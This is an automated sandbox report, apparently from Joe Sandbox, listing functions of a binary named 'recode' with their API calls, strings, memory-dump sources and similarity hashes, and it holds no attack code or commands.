Similarity

API ID: fclose$fseekftell$freadmemset
String ID:
API String ID: 3913406393-0
Opcode ID: bafc0319668b9307758dd6b677361da32d691bfb998c009046ba77b346d93747
Instruction ID: 23be8c8ce4153fa1cf5f9920ca4db49723d49aab6fb3b0da44b8ebc51d6d330b
Opcode Fuzzy Hash: bafc0319668b9307758dd6b677361da32d691bfb998c009046ba77b346d93747
Instruction Fuzzy Hash: 1F315321B0AB43C3EA64AB16A959339E790AF45B90FCC0135DD6E537D0EF3CE45A8364

Function 00007FF758002020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF75800207F

Part of subcall function 00007FF75805FB48: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF758002084), ref: 00007FF75805FB4C
Part of subcall function 00007FF75805FB48: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF758002084), ref: 00007FF75805FB5B

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800214F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800222A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF75800226F
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF7580022BD

Strings

: ", xrefs: 00007FF7580021A5
", ", xrefs: 00007FF7580021D8

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememmove
String ID: ", "$: "
API String ID: 1229626011-747220369
Opcode ID: b508b6262a71f00ab062f283f32db5292dfa2acd2517a13f146330ffd8cdb86a
Instruction ID: 0e20f1f279d1d951e42031827b80c2ccf2e8192ccdce7f1fb187b7b737e6d245
Opcode Fuzzy Hash: b508b6262a71f00ab062f283f32db5292dfa2acd2517a13f146330ffd8cdb86a
Instruction Fuzzy Hash: 6C81BE62B08B41DAEB05EF65E4543BCE361EB08B88F844532DE6D17BC9DE38E499C354

Function 00007FF758034AD0 Relevance: 12.2, APIs: 8, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45280bfb13901e7b31f040bd1d43ad789039104c8f97e8369baa11062aa915f6
Instruction ID: 2b2b0d5f16ea4b012ff53f35e498c08c8609cbd100acc4998745148ded47873d
Opcode Fuzzy Hash: 45280bfb13901e7b31f040bd1d43ad789039104c8f97e8369baa11062aa915f6
Instruction Fuzzy Hash: E6717E02D28BCE42F1A3663651437FDE2805FBF285E9D9723B99C390F29F5836DA4518

Function 00007FF75801DA80 Relevance: 12.1, APIs: 8, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E3EB
Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E40D
Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E476
Part of subcall function 00007FF75800E3B0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E49A
Part of subcall function 00007FF75800E3B0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E4A6

ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DAD6
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DAF2
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB03
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB1D
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB6D
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB7B
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DB83

Part of subcall function 00007FF758010380: memmove.VCRUNTIME140 ref: 00007FF75801041A

fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75801DBC0

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ByteCharMultiWide$fclose$fseekftell$_wfopenfreadmemmove
String ID:
API String ID: 3216918565-0
Opcode ID: f14a65b11aa5200585e567fa9ae2d8e8391c0c5e8006d4771b0bd32d06acc466
Instruction ID: 39b74030c843c54f5d991e6d7de84d1c4edf876a4a96bf15469af02c6ac2798d
Opcode Fuzzy Hash: f14a65b11aa5200585e567fa9ae2d8e8391c0c5e8006d4771b0bd32d06acc466
Instruction Fuzzy Hash: 7341B421B09A86C7EA54BB269854339E390AF45BE4F8C0231DD1F077D5EF3CE44A8768

Function 00007FF758026E10 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

APIs

ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758026F75
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758026F88
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758027052
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF75802706A
cosf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580270D8
sinf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF7580270EF
ceilf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758027189

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ceilf$cosfsinf
String ID:
API String ID: 125261001-0
Opcode ID: bc58f9fe8f297e19e4bd16ce9f371bf510dbb18985579d327c967330b97f3463
Instruction ID: 1fa38b4fac1f8af8399b18370afc82482f32624bb8de9026080adb3b2f9a17e2
Opcode Fuzzy Hash: bc58f9fe8f297e19e4bd16ce9f371bf510dbb18985579d327c967330b97f3463
Instruction Fuzzy Hash: C8A13D21E186C987E663A736E0412A9F350AF6D344F5C9732E98E321F1EF6DF0D98614

Function 00007FF7580344E0 Relevance: 10.7, APIs: 7, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451eadae1e0d701bb950b7ebe1408d94740019218ad499df2b720e2fcf1e283e
Instruction ID: b854568c25def3bfc191ed5029ce12c1c4ad75277b11924b01f5d0870a0671a3
Opcode Fuzzy Hash: 451eadae1e0d701bb950b7ebe1408d94740019218ad499df2b720e2fcf1e283e
Instruction Fuzzy Hash: 9A81A002E18ACE82F2A3753691436FCE2805FBE285EAD9733F94D350E39F5876DA4014

Function 00007FF7580460F0 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF758046184
memmove.VCRUNTIME140 ref: 00007FF7580461C8
memmove.VCRUNTIME140 ref: 00007FF7580461E0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF758046268
memmove.VCRUNTIME140 ref: 00007FF758046295
memmove.VCRUNTIME140 ref: 00007FF7580462B0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580462D3

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 041666be752f0d877f283caba22f191f3ee315efa7d982ea41cbf8a8612688dc
Instruction ID: ccffdade7496fcfc005bf1191fd4508b9ee392112bc786c15d434a0f9bf3cb5e
Opcode Fuzzy Hash: 041666be752f0d877f283caba22f191f3ee315efa7d982ea41cbf8a8612688dc
Instruction Fuzzy Hash: CE51C132E08B8193FA10AF61D644269A360FB15B84F9C4632DF6C177E2DF38E599D354

Function 00007FF758003500 Relevance: 9.1, APIs: 6, Instructions: 123COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF7580035EC
memset.VCRUNTIME140 ref: 00007FF7580035F9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF758003632
memmove.VCRUNTIME140 ref: 00007FF75800363C
memset.VCRUNTIME140 ref: 00007FF758003649
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF75800367D

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmovememset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2171940698-0
Opcode ID: 7dd8340ef7fcd983fb3ab394d37465c11bd38e4114702af85f826c69b2d15a69
Instruction ID: d248b22961726c24aa3979375bfe27f77a97f8b3e4653e69c635bf305130d085
Opcode Fuzzy Hash: 7dd8340ef7fcd983fb3ab394d37465c11bd38e4114702af85f826c69b2d15a69
Instruction Fuzzy Hash: E0411861B08A81C6EA21FB12E10436EE391AB04BD4FC94635DEAD07BE5CE3CD149C318

Function 00007FF75803CB20 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 151COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF75803CCCF

Strings

##previewing_picker, xrefs: 00007FF75803CCDF
##selectable, xrefs: 00007FF75803CC83
Alpha Bar, xrefs: 00007FF75803CD5B
context, xrefs: 00007FF75803CB68

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID: ##previewing_picker$##selectable$Alpha Bar$context
API String ID: 2162964266-280553805
Opcode ID: ac797292b5c4a29898d144dc51c65400cc14d7787965633162681148a35cc121
Instruction ID: 6dbe3889fd1593c0762367e26f4600b1b4321b6b65017e49b4ed7886e16aa919
Opcode Fuzzy Hash: ac797292b5c4a29898d144dc51c65400cc14d7787965633162681148a35cc121
Instruction Fuzzy Hash: 5661E532A1868583E761AB26E8413BAF790FF85350FCC4231EA8D572E1DF3CE5498B14

Function 00007FF758003690 Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,00007FF758002D95), ref: 00007FF758003785
memmove.VCRUNTIME140(?,?,?,?,?,?,00007FF758002D95), ref: 00007FF758003793
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00007FF758002D95), ref: 00007FF7580037CC
memmove.VCRUNTIME140(?,?,?,?,?,?,00007FF758002D95), ref: 00007FF7580037E4
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF758003819

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 8d67c873f691889687a25a05f7c6aacda81ab70175806d645386a33a3fd64527
Instruction ID: b20c9bf39fd2477b1fa62a2109464ac4d796ebb9aed276b93875379073988102
Opcode Fuzzy Hash: 8d67c873f691889687a25a05f7c6aacda81ab70175806d645386a33a3fd64527
Instruction Fuzzy Hash: 8141B662B08A86C6EE21FB12A50426AE355BB04BD4FCC4631DEAD077C6DF7CE0459328

Function 00007FF758045EF0 Relevance: 7.6, APIs: 5, Instructions: 109sleepCOMMON

Download Yara Rule

APIs

_Query_perf_frequency.MSVCP140 ref: 00007FF758045F73
_Query_perf_counter.MSVCP140 ref: 00007FF758045F7B
Sleep.KERNEL32 ref: 00007FF75804602B
Sleep.KERNEL32 ref: 00007FF75804603E
Sleep.KERNEL32 ref: 00007FF75804606C

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: 420da8ebd6776998d6cdbc5d0d302419e121f5423e74a88c39f72df4b33c9da7
Instruction ID: 124ce696de670ea9c1d7aa23d9f964b6f289b4caed05f31385f87fda388520b2
Opcode Fuzzy Hash: 420da8ebd6776998d6cdbc5d0d302419e121f5423e74a88c39f72df4b33c9da7
Instruction Fuzzy Hash: B6311461F0934A03FE28AA59A5152BAC2519F88BD0F8C9236D95E0F7F2FC7DF4498314

Function 00007FF75800E3B0 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E3EB
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E40D
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E476
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E49A
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,00007FF758019553,?,?,00000000,00007FF75801ACDB,?,?,?,00007FF75800B137), ref: 00007FF75800E4A6

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: ByteCharMultiWide$_wfopen
String ID:
API String ID: 1670196454-0
Opcode ID: 1f1a8d6932528ea41ac1b29b289a75a3390c02b7388808cd62345f2db7561aef
Instruction ID: c41de06cc614ced398852baa484c3a263c1af751c5b8dd2efbb07288e288b4d3
Opcode Fuzzy Hash: 1f1a8d6932528ea41ac1b29b289a75a3390c02b7388808cd62345f2db7561aef
Instruction Fuzzy Hash: 26315232609B8286E724AF56A85013AF6A1FB88BD0F9C4239DA9D57BE5DF3CD0058714

Function 00007FF758002300 Relevance: 6.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

APIs

__std_exception_destroy.VCRUNTIME140 ref: 00007FF758002411
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75800243D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF75800256B
__std_exception_copy.VCRUNTIME140 ref: 00007FF7580025AD

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
String ID:
API String ID: 2138705365-0
Opcode ID: 1f258f5684e2129413365762fd76f50ae9fa24140979823365c0883e3c78df7a
Instruction ID: 37fd607691dbeebc5f36286ca73f647d41c2a8c080f255b3c41316a9faa05fdb
Opcode Fuzzy Hash: 1f258f5684e2129413365762fd76f50ae9fa24140979823365c0883e3c78df7a
Instruction Fuzzy Hash: AE817172A04A85D2EB05EF29E48436CE365FB44F88FD84032DA4D076A9DF78D9D9C354

Function 00007FF758035E20 Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758035F93
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758035FBD
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758035FE0
powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758036004

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 7e884747b8af81ce02f81c8d44412077219ee735e734bf570d693c57e63700e8
Instruction ID: 30c3b1b2d498aa1f420f6fac887f2166ea8fca5a52635cd1fb3c5f9f476e5fe1
Opcode Fuzzy Hash: 7e884747b8af81ce02f81c8d44412077219ee735e734bf570d693c57e63700e8
Instruction Fuzzy Hash: 52618F22C28B8D82F023623791430F6E6905F7F246EACDB23F99C355F19F19B5CA6118

Function 00007FF7580031E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF7580032E4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF758003334
memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FF758001A25), ref: 00007FF75800333E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF758003387

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2016347663-0
Opcode ID: 2b50664d9895a9ebe83a9936526915c8d2872e887b59c1edcbdb80d6d4381a11
Instruction ID: 65e436244a1a96c75de4ef837c65df10bd0935c1fa5d2137d279d0af70c8d646
Opcode Fuzzy Hash: 2b50664d9895a9ebe83a9936526915c8d2872e887b59c1edcbdb80d6d4381a11
Instruction Fuzzy Hash: B341AE62B08A8192EA15EB12E14416DE390BB44BE4FD94735EA7D07BD4EF3CE04AC318

Function 00007FF758003390 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FF758003471
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7580034AE
memmove.VCRUNTIME140 ref: 00007FF7580034B8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7580034EB

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

